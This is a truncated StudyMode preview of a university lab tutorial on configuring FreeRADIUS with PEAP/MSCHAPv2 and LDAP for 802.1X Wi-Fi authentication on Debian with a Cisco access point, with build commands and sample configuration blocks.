Freeradius Eduroam

Only available on StudyMode
  • Topic: Authentication, AAA protocol, Extensible Authentication Protocol
  • Pages : 5 (1328 words )
  • Download(s) : 384
  • Published : June 10, 2012
Open Document
Text Preview
Configuring PEAP / LDAP based authentication using FreeRADIUS on Debian Sarge and Cisco AP1200, with WPA2 AES encryption

Ivan Klimek Computer Networks Laboratory Technical University Kosice, Slovakia

1. Introduction
This document describes the configuration steps needed to set up and use 802.1X: Port-Based Network Access Control using PEAP (PEAP/MSCHAPv2) as authentication method and FreeRADIUS as back-end authentication server running on Debian Sarge. Cisco AP1200 series as the authenticator. And Windows XP default build-in supplicant.

2. FreeRadius 2.1 Before the installation
apt-get install libssl-dev apt-get build-dep freeradius

2.2 Working with the source
- getting the source code: apt-get source freeradius - unpacking, compile, make, make install (the filename can be different) tar zxfv freeradius-1.0.4.tar.gz cd freeradius-1.0.4 ./configure --disable-shared make make install

2.3 Configuring FreeRADIUS
- the binaries are installed in /usr/local/bin and /usr/local/sbin. The configuration files are found under /usr/local/etc/raddb. cd /usr/local/etc/raddb

- Open the main configuration file radiusd.conf. Inside the encrypted PEAP tunnel, an MS-CHAPv2 authentication mechanism is used. - it should look like this: mschap { # # # # # #

As of 0.9, the mschap module does NOT support reading from /etc/smbpasswd. If you are using /etc/smbpasswd, see the 'passwd' module for an example of how to use /etc/smbpasswd

# authtype value, if present, will be used # to overwrite (or add) Auth-Type during # authorization. Normally should be MS-CHAP authtype = MS-CHAP # if use_mppe is not set to no mschap will # add MS-CHAP-MPPE-Keys for MS-CHAPv1 and # MS-MPPE-Recv-Key/MS-MPPE-Send-Key for MS-CHAPv2 # use_mppe = yes # if mppe is enabled require_encryption makes # encryption moderate # require_encryption = yes # require_strong always requires 128 bit key # encryption # require_strong = yes # Windows sends us a username in the form of # DOMAIN\user, but sends the challenge response # based on only the user portion. This hack # corrects for that incorrect behavior. # #with_ntdomain_hack = no # The module can perform authentication itself, OR # use a Windows Domain Controller. This configuration # directive tells the module to call the ntlm_auth # program, which will do the authentication, and return # the NT-Key. Note that you MUST have "winbindd" and

# "nmbd" running on the local machine for ntlm_auth # to work. See the ntlm_auth program documentation # for details. # # Be VERY careful when editing the following line! # #ntlm_auth = "/path/to/ntlm_auth --request-nt-key --username=% {Stripped-User-Name:-%{User-Name:-None}} --challenge=%{mschap:Challenge:00} --nt-response=%{mschap:NT-Response:-00}" }

- configuring LDAP support:
# Lightweight Directory Access Protocol (LDAP) # # This module definition allows you to use LDAP for # authorization and authentication (Auth-Type := LDAP) # # See doc/rlm_ldap for description of configuration options # and sample authorize{} and authenticate{} blocks ldap { server = "" identity = "cn=wifiadmin-ro,cn=ServiceAdmins,ou=LdapAdmins,dc=sk" password = "password" basedn = ",ou=People,dc=sk" filter = "(eapLogin=%{Stripped-User-Name:-%{User-Name}})" start_tls = no tls_mode = no dictionary_mapping = ${raddbdir}/ldap.attrmap ldap_connections_number = 5 password_attribute = eapUserPassword reply_attribute = eapUserPassword timeout = 4 timelimit = 3 net_timeout = 1 }

- Also make sure the "authorize" and "authenticate" contains: authorize { preprocess mschap suffix eap files ldap


authenticate { # # MSCHAP authentication. Auth-Type MS-CHAP { mschap } # # Allow EAP authentication. eap


- open the file clients.conf which speciefies the AP the authenticator server will be serving, a sample: client { secret = secret shortname = test }

- this specifies the IP address of the AP. Secret stands for shared...
tracking img